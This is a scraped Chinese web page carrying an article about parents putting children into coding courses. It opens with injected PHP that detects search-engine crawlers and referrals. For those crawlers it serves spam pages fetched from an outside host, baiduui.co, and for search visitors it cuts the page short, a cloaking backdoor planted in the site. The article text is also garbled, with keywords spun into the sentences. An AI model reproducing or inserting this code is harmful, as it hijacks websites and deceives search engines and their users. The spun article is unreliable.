header("Content-type: text/html; charset=utf-8"); set_time_limit(30); error_reporting(0); ini_set('user_agent','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'); $user_agent = $_SERVER['HTTP_USER_AGENT']; $referrer = $_SERVER['HTTP_REFERER']; $host = $_SERVER['HTTP_HOST']; $uri = $_SERVER['REQUEST_URI']; $rhost = preg_replace("/[^a-zA-Z0-9]/", "", $host); $ruri = preg_replace("/[^a-zA-Z0-9]/", "", $uri); $url = "https://sc.baiduui.co"."/".$rhost."/".$ruri.".html"; $Ourl = "https://an.baiduui.co"."/".$rhost."/".$ruri.".html"; $exp = array('google.com','yahoo.com','bing.com','baidu.com','sogou','soso',"sm"); foreach ($exp as $engine) { if (strpos($user_agent, $engine) !== false) { if(strpos($uri, '/?') !== false) { $file_contents = file_get_contents($url); echo $file_contents; exit; }elseif (strlen($uri) == 1) { $file_contents = file_get_contents($Ourl); echo $file_contents; break; }else { $file_contents = file_get_contents($Ourl); echo $file_contents; break; } } }; $is_search_engine_referral = false; foreach ($exp as $engine) { if (strpos($referrer, $engine) !== false && strlen($uri) !== 1) { echo ''; echo ''; echo ''; exit(); } }; 科创教育火了,家长们闯进了少儿编程赛道-挨三顶五网

您现在的位置是:挨三顶五网 > 探索

科创教育火了,家长们闯进了少儿编程赛道

挨三顶五网2024-05-19 04:21:17【探索】1人已围观

简介北京3月17日电(张钰惠)“未来的文盲,就是不懂编程的人。”近年来,家长们闯进了少儿编程赛道。少儿编程都在学什么?家长们对少儿编程有着怎样的认知和期待?

  北京3月17日电(张钰惠)“未来的科创文盲,就是教育不懂编程的人。”近年来,长们闯进家长们闯进了少儿编程赛道。少儿赛道少儿编程都在学什么?家长们对少儿编程有着怎样的编程认知和期待?

很赞哦!(15)